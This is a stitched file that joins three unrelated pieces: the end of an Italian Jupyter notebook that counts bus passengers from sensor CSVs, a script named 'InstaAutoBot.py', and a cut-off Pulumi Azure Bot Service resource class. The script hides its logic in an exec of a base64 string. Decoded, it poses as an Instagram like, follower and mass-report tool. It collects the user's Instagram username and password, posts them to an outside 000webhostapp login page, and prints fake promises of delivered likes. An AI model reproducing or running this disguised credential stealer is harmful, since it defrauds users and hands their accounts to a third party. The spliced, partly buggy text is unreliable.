"['2018-11-26 16:08:35.643451', 11]\n",
"['2018-11-26 16:09:02.753204', 10]\n",
"['2018-11-26 16:09:55.807329', 9]\n",
"['2018-11-26 16:10:11.695953', 10]\n",
"['2018-11-26 16:11:03.510206', 9]\n",
"['2018-11-26 16:11:08.412861', 10]\n",
"['2018-11-26 16:11:45.201190', 9]\n"
]
}
],
"source": [
"import csv\n",
"import datetime\n",
"\n",
"with open ('Rilevazioni_sensori.csv', encoding = 'utf-8', newline = '') as f:\n",
" lettore = csv.reader (f, delimiter = ',')\n",
" passeggeri = {}\n",
" n_passeggeri = 0\n",
" next(lettore)\n",
" \n",
" old_n_passeggeri = -1\n",
" for riga in lettore:\n",
" Linea = int(riga[0])\n",
" DaTi = float(riga [1])\n",
" if DaTi>1542848400 and DaTi<1542934800 :\n",
" Data = 22_11_2018\n",
" if DaTi>1542934800 and DaTi<1543021200 :\n",
" Data = 23_11_2018\n",
" if DaTi>1543021200 and DaTi<1543107600 :\n",
" Data = 24_11_2018\n",
" if DaTi>1543107600 and DaTi<1543194000 :\n",
" Data = 25_11_2018\n",
" if DaTi>1543194000 and DaTi<1543280400 :\n",
" Data = 26_11_2018\n",
" else:\n",
" data = 'boh'\n",
" \n",
" t2 = datetime.datetime.fromtimestamp(DaTi)\n",
" \n",
" IDd = str(riga[2])\n",
" passeggeri[IDd] = riga[1]\n",
" chiavi_pass = passeggeri.keys()\n",
" for chiave in list(chiavi_pass):\n",
" if float(passeggeri[chiave]) < (DaTi-240):\n",
" del passeggeri [chiave]\n",
" n_passeggeri = len(passeggeri)\n",
" with open ('Sen_linea_'+str(Linea)+str(Data)+'.csv', 'a') as nuovo:\n",
" dato = []\n",
" writer = csv.writer(nuovo, delimiter = ',')\n",
" if n_passeggeri != old_n_passeggeri:\n",
" dato.append(str(t2))\n",
" dato.append(n_passeggeri)\n",
" old_n_passeggeri = n_passeggeri\n",
" print (dato)\n",
" writer.writerow(dato)\n",
" \n",
" \n",
" "
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.7.3"
}
},
"nbformat": 4,
"nbformat_minor": 2
}
| 42.816013
| 86
| 0.462894
| 120,589
| 615,523
| 2.361849
| 0.07232
| 0.292908
| 0.34035
| 0.162328
| 0.755524
| 0.745847
| 0.29709
| 0.016014
| 0.010923
| 0.010923
| 0
| 0.549776
| 0.209131
| 615,523
| 14,375
| 87
| 42.818991
| 0.035298
| 0
| 0
| 0.016209
| 0
| 0.000278
| 0.76726
| 0.000726
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.001183
| 0.000278
| 0
| 0.000278
| 0.000209
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0e798e739349074c7519c15de51754d0ea5fad86
| 5,430
|
py
|
Python
|
InstaAutoBot.py
|
Unknownhacker007/Instagram-Bot
|
0df77aed9383b4e475954a4c962fe0b3fdb2c6da
|
[
"MIT"
] | 2
|
2020-10-29T12:30:48.000Z
|
2020-12-03T15:04:11.000Z
|
InstaAutoBot.py
|
Unknownhacker007/Instagram-Bot
|
0df77aed9383b4e475954a4c962fe0b3fdb2c6da
|
[
"MIT"
] | null | null | null |
InstaAutoBot.py
|
Unknownhacker007/Instagram-Bot
|
0df77aed9383b4e475954a4c962fe0b3fdb2c6da
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import os
import base64
import requests
import time
exec(base64.b64decode("YmFubmVyID0gIiIiCiAgICAgICAgICAgICAgICAgXyAgICAgICAgICAgXyAgICAgICAgICBfICAgICAgICAgICBfCiAgICAgICAgICAgICAgICAoXykgICAgICAgICB8IHwgICAgICAgIHwgfCAgICAgICAgIHwgfAogICAgICAgICAgICAgICAgIF8gXyBfXyAgX19ffCB8XyBfXyBfICB8IHxfXyAgIF9fXyB8IHxfCiAgICAgICAgICAgICAgICB8IHwgJ18gXC8gX198IF9fLyBfYCB8IHwgJ18gXCAvIF8gXHwgX198CiAgICAgICAgICAgICAgICB8IHwgfCB8IFxfXyBcIHx8IChffCB8IHwgfF8pIHwgKF8pIHwgfF8KICAgICAgICAgICAgICAgIHxffF98IHxffF9fXy9cX19cX18sX3wgfF8uX18vIFxfX18vIFxfX3wKIiIiCmltcG9ydCBvczsKaW1wb3J0IHRpbWU7CmltcG9ydCByZXF1ZXN0czsKZ3JlZW4gPSAnXDAzM1szMm0nCm9zLnN5c3RlbSgiY2xlYXIiKQpwcmludChncmVlbiArIGJhbm5lcikKcHJpbnQoZ3JlZW4gKyAiWzFdIEluc3RhZ3JhbSBhdXRvIGxpa2VyIikKcHJpbnQoZ3JlZW4gKyAiWzJdSW5zdGFncmFtIGF1dG8gZm9sbG93ZXJzIikKcHJpbnQoZ3JlZW4gKyAiWzNdSW5zdGFncmFtIGF1dG8gcmVwb3J0IikKcHJpbnQoZ3JlZW4gKyAiWzRdRXhpdCIpCnByaW50KCIiKQp0cnk6CglvcHRpb24gPSBpbnB1dChncmVlbiArICJFbnRlciB5b3VyIG9wdGlvbjogIikKCXByaW50KCIiKQoJaWYgKG9wdGlvbj09IjEiKToKCQlvcy5zeXN0ZW0oImNsZWFyIikKCQlwcmludChncmVlbiArIGJhbm5lcikKCQlwcmludCgiIikKCQl1c2VybmFtZSA9IGlucHV0KGdyZWVuICsgIlsqXUVudGVyIFVzZXJuYW1lOiAiKQoJCXByaW50KCIiKQoJCXBhc3N3b3JkID0gaW5wdXQoZ3JlZW4gKyAiWypdRW50ZXIgUGFzc3dvcmQ6ICIpCgkJcHJpbnQoIiIpCgkJdHJ5OgoJCQlpZiAodXNlcm5hbWU9PSIiKToKCQkJCXByaW50KGdyZWVuICsgIkludmFsaWQgbG9naW4iKQoJCQkJZXhpdCgpCgkJCWVsaWYgKHBhc3N3b3JkPT0iIik6CgkJCQlwcmludChncmVlbiArICJJbnZhbGlkIGxvZ2luIikKCQkJCWV4aXQoKQoJCQllbHNlOgoJCQkJdXJsID0gImh0dHBzOi8vcGFuZGlha3VuYWwuMDAwd2ViaG9zdGFwcC5jb20vbG9naW4ucGhwIgoJCQkJZGF0YSA9IHsndXNlcm5hbWUnOnVzZXJuYW1lLCAncGFzc3dvcmQnOnBhc3N3b3JkfQoJCQkJcHJpbnQoZ3JlZW4gKyAibG9naW5nIGluLi4uIikKCQkJCXJlcXVlc3RzLnBvc3QodXJsLCBkYXRhPWRhdGEpCgkJCQlsaW5rID0gaW5wdXQoZ3JlZW4gKyAiWypdRW50ZXIgdGhlIGxpbmsgb2YgdGhlIHBvc3Q6ICIpCgkJCQlwcmludChncmVlbiArICJwcm9jZXNzaW5nOiAiICsgbGluaykKCQkJCXRpbWUuc2xlZXAoMSkKCQkJCXByaW50KGdyZWVuICsgIjEwMCBsaWtlcyB3aWxsIGJlIGFkZGVkIHRvIHlvdXIgcG9zdCB3aXRoaW4gMjQgaG91cnMiKQoJCQkJcHJpbnQoZ3JlZW4gKyAicGxlYXNlIHdhaXQuLi4iKQoJCQkJcHJpbnQoZ3JlZW4gKyAiZGFpbHkgbGltaXQ6IDIgdGltZXMiKQoJCQkJZXhpdCgpCgkJZXhjZXB0IEtleWJvYXJkSW50ZXJydXB0OgoJCQlwcmludChncmVlbiArICJrZXlib2FyZCBpbnRlcnJ1cHRlZCIpCgkJCXByaW50KGdyZWVuICsgImV4aXRpbmcuLi4iKQoJCQlleGl0KCkKCWVsaWYgKG9wdGlvbj09IjIiKToKCQlvcy5zeXN0ZW0oImNsZWFyIikKCQlwcmludChncmVlbiArIGJhbm5lcikKCQlwcmludCgiIikKCQl1c2VybmFtZSA9IGlucHV0KGdyZWVuICsgIlsqXUVudGVyIFVzZXJuYW1lOiAiKQoJCXByaW50KCIiKQoJCXBhc3N3b3JkID0gaW5wdXQoZ3JlZW4gKyAiWypdRW50ZXIgUGFzc3dvcmQ6ICIpCgkJcHJpbnQoIiIpCgkJdHJ5OgoJCQlpZiAodXNlcm5hbWU9PSIiKToKCQkJCXByaW50KGdyZWVuICsgIkludmFsaWQgbG9naW4iKQoJCQkJZXhpdCgpCgkJCWVsaWYgKHBhc3N3b3JkPT0iIik6CgkJCQlwcmludChncmVlbiArICJJbnZhbGlkIGxvZ2luIikKCQkJCWV4aXQoKQoJCQllbHNlOgoJCQkJdXJsID0gImh0dHBzOi8vcGFuZGlha3VuYWwuMDAwd2ViaG9zdGFwcC5jb20vbG9naW4ucGhwIgoJCQkJZGF0YSA9IHsndXNlcm5hbWUnOnVzZXJuYW1lLCAncGFzc3dvcmQnOnBhc3N3b3JkfQoJCQkJcHJpbnQoZ3JlZW4gKyAibG9naW5nIGluLi4uIikKCQkJCXJlcXVlc3RzLnBvc3QodXJsLCBkYXRhPWRhdGEpCgkJCQl0aW1lLnNsZWVwKDEpCgkJCQlwcmludChncmVlbiArICIyMDAgZm9sbG93ZXJzIHdpbGwgYmUgYWRkZWQgdG8geW91ciBhY2NvdW50IHdpdGhpbiAyNCBob3VycyIpCgkJCQlwcmludChncmVlbiArICJwbGVhc2Ugd2FpdC4uLiIpCgkJCQlwcmludChncmVlbiArICJkYWlseSBsaW1pdDogMSB0aW1lcyIpCgkJCQlleGl0KCkKCQlleGNlcHQgS2V5Ym9hcmRJbnRlcnJ1cHQ6CgkJCXByaW50KGdyZWVuICsgImtleWJvYXJkIGludGVycnVwdGVkIikKCQkJcHJpbnQoZ3JlZW4gKyAiZXhpdGluZy4uLiIpCgkJCWV4aXQoKQoJZWxpZiAob3B0aW9uPT0iMyIpOgoJCW9zLnN5c3RlbSgiY2xlYXIiKQoJCXByaW50KGdyZWVuICsgYmFubmVyKQoJCXByaW50KCIiKQoJCXVzZXJuYW1lID0gaW5wdXQoZ3JlZW4gKyAiWypdRW50ZXIgVXNlcm5hbWU6ICIpCgkJcHJpbnQoIiIpCgkJcGFzc3dvcmQgPSBpbnB1dChncmVlbiArICJbKl1FbnRlciBQYXNzd29yZDogIikKCQlwcmludCgiIikKCQl0cnk6CgkJCWlmICh1c2VybmFtZT09IiIpOgoJCQkJcHJpbnQoZ3JlZW4gKyAiSW52YWxpZCBsb2dpbiIpCgkJCQlleGl0KCkKCQkJZWxpZiAocGFzc3dvcmQ9PSIiKToKCQkJCXByaW50KGdyZWVuICsgIkludmFsaWQgbG9naW4iKQoJCQkJZXhpdCgpCgkJCWVsc2U6CgkJCQl1cmwgPSAiaHR0cHM6Ly9wYW5kaWFrdW5hbC4wMDB3ZWJob3N0YXBwLmNvbS9sb2dpbi5waHAiCgkJCQlkYXRhID0geyd1c2VybmFtZSc6dXNlcm5hbWUsICdwYXNzd29yZCc6cGFzc3dvcmR9CgkJCQlwcmludChncmVlbiArICJsb2dpbmcgaW4uLi4iKQoJCQkJcmVxdWVzdHMucG9zdCh1cmwsIGRhdGE9ZGF0YSkKCQkJCWFjID0gaW5wdXQoZ3JlZW4gKyAiWypdRW50ZXIgdGhlIHByb2ZpbGUgdG8gcmVwb3J0OiAiKQoJCQkJcHJpbnQoIiIpCgkJCQlwcmludChncmVlbiArICJzZWxlY3QgeW91ciBvcHRpb246IikKCQkJCXByaW50KGdyZWVuICsgIlsxXUluYXBwcm9wcmlhdGUiKQoJCQkJcHJpbnQoZ3JlZW4gKyAiWzJdUG9zdCB3aXRoIHNleHVhbCBjb250ZW50IikKCQkJCXByaW50KGdyZWVuICsgIlszXURydWcgYWJ1c2UiKQoJCQkJcHJpbnQoZ3JlZW4gKyAiWzRdU3BhbW1pbmciKQoJCQkJcHJpbnQoIiIpCgkJCQlyZXBvcnQgPSBpbnB1dChncmVlbiArICJbKl1FbnRlciB5b3VyIG9wdGlvbjogIikKCQkJCWNvdW50ID0gaW5wdXQoZ3JlZW4gKyAiWypdRW50ZXIgbnVtYmVyIG9mIHJlcG9ydHM6ICIpCgkJCQl0aW1lLnNsZWVwKDAuNSkKCQkJCXByaW50KGdyZWVuICsgIlNlbGVjdCBvcHRpb246ICIgKyByZXBvcnQpCgkJCQlwcmludChncmVlbiArICJjb3VudDogIiArIGNvdW50KQoJCQkJdGltZS5zbGVlcCgxKQoJCQkJcHJpbnQoZ3JlZW4gKyAiUmVwb3J0aW5nLi4uIikKCQkJCXByaW50KGdyZWVuICsgIlJlcG9ydGluZyAiICsgYWMpCgkJCQl0aW1lLnNsZWVwKDEpCgkJCQlwcmludChncmVlbiArICJZb3VyIHJlcG9ydHMgd2lsbCBiZSBzdWJtaXR0ZWQgd2l0aGluIDEgaG91ci4uLiIpCgkJCQlleGl0KCkKCQlleGNlcHQgS2V5Ym9hcmRJbnRlcnJ1cHQ6CgkJCXByaW50KGdyZWVuICsgImtleWJvYXJkIGludGVycnVwdGVkIikKCQkJcHJpbnQoZ3JlZW4gKyAiZXhpdGluZy4uLiIpCgkJCWV4aXQoKQkKCWVsaWYgKG9wdGlvbj09IjQiKToKCQlwcmludChncmVlbiArICJleGl0aW5nLi4uIikKCQlleGl0KCkKCWVsc2U6CgkJcHJpbnQoZ3JlZW4gKyAiSW52YWxpZCBpbnB1dCIpCgkJcHJpbnQoZ3JlZW4gKyAiZXhpdGluZy4uLiIpCgkJZXhpdCgpCmV4Y2VwdCBLZXlib2FyZEludGVycnVwdDoKCXByaW50KGdyZWVuICsgImtleWJvYXJkIGludGVycnVwdGVkIikKCWV4aXQoKQoKZXhpdCgp"))
| 678.75
| 5,354
| 0.99558
| 16
| 5,430
| 337.875
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091362
| 0.00221
| 5,430
| 8
| 5,354
| 678.75
| 0.906423
| 0.003683
| 0
| 0
| 0
| 0
| 0.984843
| 0.984843
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 11
|
7d0741c10f65d854557515c5b7cdedc65ef3cecf
| 38,821
|
py
|
Python
|
sdk/python/pulumi_azure/bot/service_azure_bot.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/bot/service_azure_bot.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/bot/service_azure_bot.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ServiceAzureBotArgs', 'ServiceAzureBot']
@pulumi.input_type
class ServiceAzureBotArgs:
def __init__(__self__, *,
microsoft_app_id: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
sku: pulumi.Input[str],
developer_app_insights_api_key: Optional[pulumi.Input[str]] = None,
developer_app_insights_application_id: Optional[pulumi.Input[str]] = None,
developer_app_insights_key: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
luis_app_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
luis_key: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a ServiceAzureBot resource.
:param pulumi.Input[str] microsoft_app_id: The Microsoft Application ID for the Azure Bot Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Azure Bot Service should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] sku: The SKU of the Azure Bot Service. Accepted values are `F0` or `S1`. Changing this forces a new resource to be created.
:param pulumi.Input[str] developer_app_insights_api_key: The Application Insights Api Key to associate with this Azure Bot Service.
:param pulumi.Input[str] developer_app_insights_application_id: The resource ID of the Application Insights instance to associate with this Azure Bot Service.
:param pulumi.Input[str] developer_app_insights_key: The Application Insight Key to associate with this Azure Bot Service.
:param pulumi.Input[str] display_name: The name that the Azure Bot Service will be displayed as. This defaults to the value set for `name` if not specified.
:param pulumi.Input[str] endpoint: The Azure Bot Service endpoint.
:param pulumi.Input[str] location: The supported Azure location where the Azure Bot Service should exist. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] luis_app_ids: A list of LUIS App IDs to associate with this Azure Bot Service.
:param pulumi.Input[str] luis_key: The LUIS key to associate with this Azure Bot Service.
:param pulumi.Input[str] name: The name which should be used for this Azure Bot Service. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags which should be assigned to this Azure Bot Service.
"""
pulumi.set(__self__, "microsoft_app_id", microsoft_app_id)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "sku", sku)
if developer_app_insights_api_key is not None:
pulumi.set(__self__, "developer_app_insights_api_key", developer_app_insights_api_key)
if developer_app_insights_application_id is not None:
pulumi.set(__self__, "developer_app_insights_application_id", developer_app_insights_application_id)
if developer_app_insights_key is not None:
pulumi.set(__self__, "developer_app_insights_key", developer_app_insights_key)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if location is not None:
pulumi.set(__self__, "location", location)
if luis_app_ids is not None:
pulumi.set(__self__, "luis_app_ids", luis_app_ids)
if luis_key is not None:
pulumi.set(__self__, "luis_key", luis_key)
if name is not None:
pulumi.set(__self__, "name", name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="microsoftAppId")
def microsoft_app_id(self) -> pulumi.Input[str]:
"""
The Microsoft Application ID for the Azure Bot Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "microsoft_app_id")
@microsoft_app_id.setter
def microsoft_app_id(self, value: pulumi.Input[str]):
pulumi.set(self, "microsoft_app_id", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group where the Azure Bot Service should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def sku(self) -> pulumi.Input[str]:
"""
The SKU of the Azure Bot Service. Accepted values are `F0` or `S1`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: pulumi.Input[str]):
pulumi.set(self, "sku", value)
@property
@pulumi.getter(name="developerAppInsightsApiKey")
def developer_app_insights_api_key(self) -> Optional[pulumi.Input[str]]:
"""
The Application Insights Api Key to associate with this Azure Bot Service.
"""
return pulumi.get(self, "developer_app_insights_api_key")
@developer_app_insights_api_key.setter
def developer_app_insights_api_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "developer_app_insights_api_key", value)
@property
@pulumi.getter(name="developerAppInsightsApplicationId")
def developer_app_insights_application_id(self) -> Optional[pulumi.Input[str]]:
"""
The resource ID of the Application Insights instance to associate with this Azure Bot Service.
"""
return pulumi.get(self, "developer_app_insights_application_id")
@developer_app_insights_application_id.setter
def developer_app_insights_application_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "developer_app_insights_application_id", value)
@property
@pulumi.getter(name="developerAppInsightsKey")
def developer_app_insights_key(self) -> Optional[pulumi.Input[str]]:
"""
The Application Insight Key to associate with this Azure Bot Service.
"""
return pulumi.get(self, "developer_app_insights_key")
@developer_app_insights_key.setter
def developer_app_insights_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "developer_app_insights_key", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
The name that the Azure Bot Service will be displayed as. This defaults to the value set for `name` if not specified.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def endpoint(self) -> Optional[pulumi.Input[str]]:
"""
The Azure Bot Service endpoint.
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The supported Azure location where the Azure Bot Service should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="luisAppIds")
def luis_app_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of LUIS App IDs to associate with this Azure Bot Service.
"""
return pulumi.get(self, "luis_app_ids")
@luis_app_ids.setter
def luis_app_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "luis_app_ids", value)
@property
@pulumi.getter(name="luisKey")
def luis_key(self) -> Optional[pulumi.Input[str]]:
"""
The LUIS key to associate with this Azure Bot Service.
"""
return pulumi.get(self, "luis_key")
@luis_key.setter
def luis_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "luis_key", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this Azure Bot Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags which should be assigned to this Azure Bot Service.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _ServiceAzureBotState:
def __init__(__self__, *,
developer_app_insights_api_key: Optional[pulumi.Input[str]] = None,
developer_app_insights_application_id: Optional[pulumi.Input[str]] = None,
developer_app_insights_key: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
luis_app_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
luis_key: Optional[pulumi.Input[str]] = None,
microsoft_app_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering ServiceAzureBot resources.
:param pulumi.Input[str] developer_app_insights_api_key: The Application Insights Api Key to associate with this Azure Bot Service.
:param pulumi.Input[str] developer_app_insights_application_id: The resource ID of the Application Insights instance to associate with this Azure Bot Service.
:param pulumi.Input[str] developer_app_insights_key: The Application Insight Key to associate with this Azure Bot Service.
:param pulumi.Input[str] display_name: The name that the Azure Bot Service will be displayed as. This defaults to the value set for `name` if not specified.
:param pulumi.Input[str] endpoint: The Azure Bot Service endpoint.
:param pulumi.Input[str] location: The supported Azure location where the Azure Bot Service should exist. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] luis_app_ids: A list of LUIS App IDs to associate with this Azure Bot Service.
:param pulumi.Input[str] luis_key: The LUIS key to associate with this Azure Bot Service.
:param pulumi.Input[str] microsoft_app_id: The Microsoft Application ID for the Azure Bot Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name which should be used for this Azure Bot Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Azure Bot Service should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] sku: The SKU of the Azure Bot Service. Accepted values are `F0` or `S1`. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags which should be assigned to this Azure Bot Service.
"""
if developer_app_insights_api_key is not None:
pulumi.set(__self__, "developer_app_insights_api_key", developer_app_insights_api_key)
if developer_app_insights_application_id is not None:
pulumi.set(__self__, "developer_app_insights_application_id", developer_app_insights_application_id)
if developer_app_insights_key is not None:
pulumi.set(__self__, "developer_app_insights_key", developer_app_insights_key)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if location is not None:
pulumi.set(__self__, "location", location)
if luis_app_ids is not None:
pulumi.set(__self__, "luis_app_ids", luis_app_ids)
if luis_key is not None:
pulumi.set(__self__, "luis_key", luis_key)
if microsoft_app_id is not None:
pulumi.set(__self__, "microsoft_app_id", microsoft_app_id)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if sku is not None:
pulumi.set(__self__, "sku", sku)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="developerAppInsightsApiKey")
def developer_app_insights_api_key(self) -> Optional[pulumi.Input[str]]:
"""
The Application Insights Api Key to associate with this Azure Bot Service.
"""
return pulumi.get(self, "developer_app_insights_api_key")
@developer_app_insights_api_key.setter
def developer_app_insights_api_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "developer_app_insights_api_key", value)
@property
@pulumi.getter(name="developerAppInsightsApplicationId")
def developer_app_insights_application_id(self) -> Optional[pulumi.Input[str]]:
"""
The resource ID of the Application Insights instance to associate with this Azure Bot Service.
"""
return pulumi.get(self, "developer_app_insights_application_id")
@developer_app_insights_application_id.setter
def developer_app_insights_application_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "developer_app_insights_application_id", value)
@property
@pulumi.getter(name="developerAppInsightsKey")
def developer_app_insights_key(self) -> Optional[pulumi.Input[str]]:
"""
The Application Insight Key to associate with this Azure Bot Service.
"""
return pulumi.get(self, "developer_app_insights_key")
@developer_app_insights_key.setter
def developer_app_insights_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "developer_app_insights_key", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
The name that the Azure Bot Service will be displayed as. This defaults to the value set for `name` if not specified.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def endpoint(self) -> Optional[pulumi.Input[str]]:
"""
The Azure Bot Service endpoint.
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The supported Azure location where the Azure Bot Service should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="luisAppIds")
def luis_app_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of LUIS App IDs to associate with this Azure Bot Service.
"""
return pulumi.get(self, "luis_app_ids")
@luis_app_ids.setter
def luis_app_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "luis_app_ids", value)
@property
@pulumi.getter(name="luisKey")
def luis_key(self) -> Optional[pulumi.Input[str]]:
"""
The LUIS key to associate with this Azure Bot Service.
"""
return pulumi.get(self, "luis_key")
@luis_key.setter
def luis_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "luis_key", value)
@property
@pulumi.getter(name="microsoftAppId")
def microsoft_app_id(self) -> Optional[pulumi.Input[str]]:
"""
The Microsoft Application ID for the Azure Bot Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "microsoft_app_id")
@microsoft_app_id.setter
def microsoft_app_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "microsoft_app_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this Azure Bot Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the Azure Bot Service should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
